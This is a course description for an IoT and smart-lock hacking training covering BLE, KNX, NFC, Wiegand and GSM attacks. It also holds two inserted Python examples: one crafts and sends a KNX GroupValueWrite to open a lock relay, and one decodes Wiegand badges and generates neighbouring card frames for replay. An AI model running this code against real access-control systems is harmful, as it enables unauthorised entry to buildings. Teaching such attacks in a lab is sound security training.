Appsec EU Training

Smart lockpicking - hands-on exploiting software flaws in IoT



There is no doubt that electronic locks are among the most profitable smart devices to attack. And yet recent disclosures of multiple vulnerabilities clearly show that vendors, so far mostly hardware companies, do not have enough specialists able to help them with software-related issues.

This course is intended to fill this skills gap. Based on hands-on exercises with real devices (we will have fun hacking a dozen different smart locks), you will learn how to analyse their security and how to design them properly. The knowledge also applies to many other IoT devices.

We will perform: wireless sniffing, spoofing, cloning, replay, DoS, authentication and command-injection attacks. Practical exercises will include investigating proprietary network protocols, demystifying and breaking “military grade encryption”, abusing excessive services, triggering fallback open, brute-forcing PINs via voice calls and attacking building automation systems.

The software activities will be mixed with short entertaining tricks, including opening a lock with a strong magnet, counterfeiting fingerprints for a biometric sensor, and opening a voice-controlled lock by remotely hacking a speaker-enabled device.

Several tasks will be associated with an electromagnetic lock guarding a special vault full of goods from Poland. Whenever a student succeeds in hacking the lock, the box opens automatically and one can have something delicious.

Technologies covered will include Bluetooth Smart, embedded Linux, KNX, NFC, Wiegand, WiFi, P2P, GSM…

Each student will receive hardware worth about 100 EUR (detailed below).

List of topics:

Bluetooth Smart

based on at least 7 different smart locks and on tools developed by the trainer: the GATTacker BLE MITM proxy and the deliberately vulnerable Hackmelock (consisting of an Android mobile application and a lock device simulated on a Raspberry Pi):

  • passive sniffing
  • static authentication password
  • spoofing
  • replay attacks
  • command injection
  • Denial of Service
  • cracking “Latest PKI technology”
  • other flaws of custom challenge-response authentication
  • abusing excessive services (e.g. the module’s default AT-command interface)
  • weaknesses of the key-sharing-with-guests functionality
  • physical hands-on: opening the lock with a strong magnet that turns the motor inside
  • takeaway Hackmelock challenges for practising later at home using provided hardware

Linux embedded

based on a wireless door lock, an alarm + home automation system and other devices:

  • authentication bypass
  • information disclosure
  • telnet brute-force
  • OS command injection
  • switching to WiFi maintenance mode using an external intercom
  • UART interfaces introduction

Proprietary network protocols

based on a fingerprint sensor device, a wireless door lock and an HVAC controller:

  • various approaches to analysing proprietary protocols
  • step-by-step dissection of packets and attacks on the fingerprint sensor’s binary remote-management protocol
  • sniffing and decoding administrative credentials
  • abusing improper session management (authentication bypass)
  • P2P communication - how to attack devices hidden behind NAT
  • a few case studies of proprietary-protocol vulnerabilities identified in financial systems, mobile apps and other devices

KNX home automation

based on an example installation connected to an electromagnetic lock:

  • theory introduction, typical architecture, group address, device address…
  • tools: ETS configuration suite vs open-source knxd, knxmap, nmap scripts
  • how to locate and connect to a KNX-IP gateway in the LAN or remotely
  • monitor mode - sniffing the bus communication
  • writing a command to a group address to open the lock
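The last two steps above (watching group telegrams on the bus, then writing to the group address that drives the lock relay) can be done without ETS once you know the frame layout. The following is an added example written for this page, not part of the course materials or of knxd/knxmap: it builds a KNXnet/IP Routing Indication carrying a cEMI GroupValueWrite and decodes frames captured from the multicast group. It assumes the gateway forwards KNXnet/IP routing traffic on the standard multicast address 224.0.23.12:3671; the source address 1.1.1 and the group address 1/0/1 are constructed placeholders for whatever monitor mode reveals on the lab installation.

```python
"""Added example (not course material): KNXnet/IP routing frames for
group monitoring and a GroupValueWrite. Assumes a KNX-IP router that
forwards routing traffic on 224.0.23.12:3671; tunnelling-only gateways
need a connect handshake first (knxd handles that for you)."""
import socket
import struct

KNX_MCAST = ("224.0.23.12", 3671)          # standard KNXnet/IP routing group
SVC_ROUTING_INDICATION = 0x0530
CEMI_L_DATA_IND = 0x29                     # message code of a telegram seen on the bus
APCI_NAMES = {0x000: "GroupValueRead", 0x040: "GroupValueResponse",
              0x080: "GroupValueWrite"}


def group_address(text):
    """'1/0/1' -> 16-bit group address: 5-bit main, 3-bit middle, 8-bit sub."""
    main, middle, sub = (int(p) for p in text.split("/"))
    if not (0 <= main < 32 and 0 <= middle < 8 and 0 <= sub < 256):
        raise ValueError(f"group address out of range: {text}")
    return (main << 11) | (middle << 8) | sub


def group_address_str(raw):
    return f"{raw >> 11}/{(raw >> 8) & 0x7}/{raw & 0xFF}"


def individual_address(text):
    """'1.1.1' -> 16-bit individual address: 4-bit area, 4-bit line, 8-bit device."""
    area, line, device = (int(p) for p in text.split("."))
    if not (0 <= area < 16 and 0 <= line < 16 and 0 <= device < 256):
        raise ValueError(f"individual address out of range: {text}")
    return (area << 12) | (line << 8) | device


def individual_address_str(raw):
    return f"{raw >> 12}.{(raw >> 8) & 0xF}.{raw & 0xFF}"


def cemi_group_write(src, dst, value):
    """cEMI L_Data.ind carrying a GroupValueWrite whose data fits in 6 bits
    (DPT 1.xxx switch, which is what a relay driving a lock listens to)."""
    if not 0 <= value < 64:
        raise ValueError("only values up to 6 bits fit into the APCI octet")
    ctrl1 = 0xBC   # standard frame, not repeated, low priority
    ctrl2 = 0xE0   # destination is a group address, hop count 6
    npdu_len = 1   # octets following the TPCI octet
    tpdu = struct.pack(">H", 0x080 | value)   # TPCI 0x00, APCI write, data in low 6 bits
    return (bytes([CEMI_L_DATA_IND, 0x00, ctrl1, ctrl2])
            + struct.pack(">HHB", src, dst, npdu_len) + tpdu)


def routing_indication(cemi):
    """Wrap a cEMI frame in a KNXnet/IP header (service type 0x0530)."""
    return struct.pack(">BBHH", 0x06, 0x10, SVC_ROUTING_INDICATION, 6 + len(cemi)) + cemi


def build_group_write(src_text, dst_text, on):
    return routing_indication(cemi_group_write(
        individual_address(src_text), group_address(dst_text), 1 if on else 0))


def decode_routing_indication(frame):
    """Parse a frame captured from the multicast group (what monitor mode shows)."""
    hdr_len, version, svc, total = struct.unpack(">BBHH", frame[:6])
    if (hdr_len, version, svc, total) != (6, 0x10, SVC_ROUTING_INDICATION, len(frame)):
        raise ValueError("not a well-formed KNXnet/IP routing indication")
    cemi = frame[6:]
    add_info_len = cemi[1]
    body = cemi[2 + add_info_len:]
    ctrl1, ctrl2, src, dst, npdu_len = struct.unpack(">BBHHB", body[:7])
    tpdu = body[7:8 + npdu_len]
    apci = ((tpdu[0] & 0x03) << 8) | (tpdu[1] & 0xC0)   # 4-bit APCI sits in bits 9..6
    value = tpdu[1] & 0x3F if npdu_len == 1 else tpdu[2:].hex()
    return {
        "src": individual_address_str(src),
        "dst": group_address_str(dst) if ctrl2 & 0x80 else individual_address_str(dst),
        "apci": APCI_NAMES.get(apci, f"0x{apci:03x}"),
        "value": value,
    }


def send_routing(frame):
    """Fire the frame at the routing multicast group (needs a live KNX-IP router)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.sendto(frame, KNX_MCAST)
    sock.close()


if __name__ == "__main__":
    # Constructed addresses: 1.1.1 as an unused source, 1/0/1 assumed to be
    # the lock relay's group address learned from monitor mode.
    frame = build_group_write("1.1.1", "1/0/1", on=True)
    print(frame.hex(" "))
    print(decode_routing_indication(frame))
    # send_routing(frame)   # uncomment on the lab network
```

The point of the exercise is that nothing in the frame authenticates the sender: any host that can reach the multicast group (or a tunnelling gateway) can write to any group address, so locating the gateway is the whole attack.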

SMS and DTMF remote control over GSM

based on a remotely controlled alarm system:

  • theory introduction to GSM interception
  • brute-forcing the alarm’s administrative PIN via automated remote SMS and voice calls

NFC

based on a hotel electronic door lock, a ski lift pass and a bus ticket:

  • cloning a contactless card
  • brute-forcing the ID

Wiegand

wired access control transmission standard:

  • theory introduction
  • sniffing the data transmitted from an access control reader using BLEKey
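What BLEKey hands you is the raw bit string the reader clocked out on DATA0/DATA1, so the next step is decoding it. As an added example for this page (not course material and not BLEKey's own code), the block below decodes and re-encodes the 26-bit Wiegand format most proximity readers emit, checks both parity bits, and enumerates neighbouring card numbers; the facility code 105 and card number 12345 are constructed sample values.

```python
"""Added example (not course material): 26-bit Wiegand decode/encode.
Layout in transmission order:
  bit 1      even parity over bits 2..13
  bits 2..9  8-bit facility code
  bits 10..25 16-bit card number
  bit 26     odd parity over bits 14..25"""


def wiegand26_decode(bits):
    """bits: 26-character string of '0'/'1' as captured from the reader."""
    if len(bits) != 26 or set(bits) - {"0", "1"}:
        raise ValueError("expected 26 bits of '0'/'1'")
    ones = [int(c) for c in bits]
    even_ok = sum(ones[0:13]) % 2 == 0   # leading parity bit plus bits 2..13
    odd_ok = sum(ones[13:26]) % 2 == 1   # bits 14..25 plus trailing parity bit
    return {
        "facility_code": int(bits[1:9], 2),
        "card_number": int(bits[9:25], 2),
        "parity_ok": even_ok and odd_ok,
    }


def wiegand26_encode(facility_code, card_number):
    """Build the bit string a reader would send for a given badge."""
    if not (0 <= facility_code < 256 and 0 <= card_number < 65536):
        raise ValueError("facility code is 8 bits, card number 16 bits")
    body = f"{facility_code:08b}{card_number:016b}"
    even = sum(int(c) for c in body[:12]) % 2          # even parity over first 12 data bits
    odd = (sum(int(c) for c in body[12:]) + 1) % 2     # odd parity over last 12 data bits
    return f"{even}{body}{odd}"


def candidate_frames(facility_code, card_number, span):
    """Frames for the card numbers around a sniffed one: badges are usually
    issued sequentially and the 16-bit number space is small anyway."""
    lo = max(0, card_number - span)
    hi = min(65535, card_number + span)
    return [wiegand26_encode(facility_code, n)
            for n in range(lo, hi + 1) if n != card_number]


if __name__ == "__main__":
    # Constructed sample badge: facility code 105, card number 12345.
    frame = wiegand26_encode(105, 12345)
    print(frame, wiegand26_decode(frame))
    print(len(candidate_frames(105, 12345, 50)), "neighbouring frames to try")
```

Because the line carries no encryption and no challenge, a captured frame replays as-is; the parity bits only catch wiring glitches, which is why the decoder reports them separately instead of treating a parity failure as tampering.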


You will also be able to try for yourself to:

  • open a smart lock using special strokes of a strong magnet that turns the device’s internal motor
  • cheat a fingerprint biometric sensor - we can make a clone of your own fingerprint during the training
  • open a voice-controlled lock by hacking a nearby speaker-enabled device

We will also have several Mirai-vulnerable cameras and a DVR. We will expose them directly to the Internet and watch how long it takes for them to be pwned. Time permitting, we will analyse the attack live.

Who should come?

Pentesters, security professionals, IoT developers, anyone interested - regardless of initial skill level or experience, everybody will learn something new.

What should students bring?

  • a contemporary laptop capable of running Kali Linux in a virtual machine
  • an Android smartphone running a version newer than 4.3. If you don’t have one, please let us know in advance - a few will be available for students.
  • basic familiarity with the Linux command line, Kali and Wireshark
  • scripting skills or pentesting experience will be an advantage, but are not crucial

What will be provided?

  • course materials as PDFs (several hundred pages)
  • all required additional files: source code, documentation, installation binaries…
  • Bluetooth Smart hardware sniffer and development kit based on the nRF51822 module
  • 2 Bluetooth Low Energy USB dongles
  • Raspberry Pi 3 with assessment tools and Hackmelock for further hacking at home
  • NFC NXP PN532 board + “magic UID” card, which allows you to clone the most common Mifare Classic contactless cards
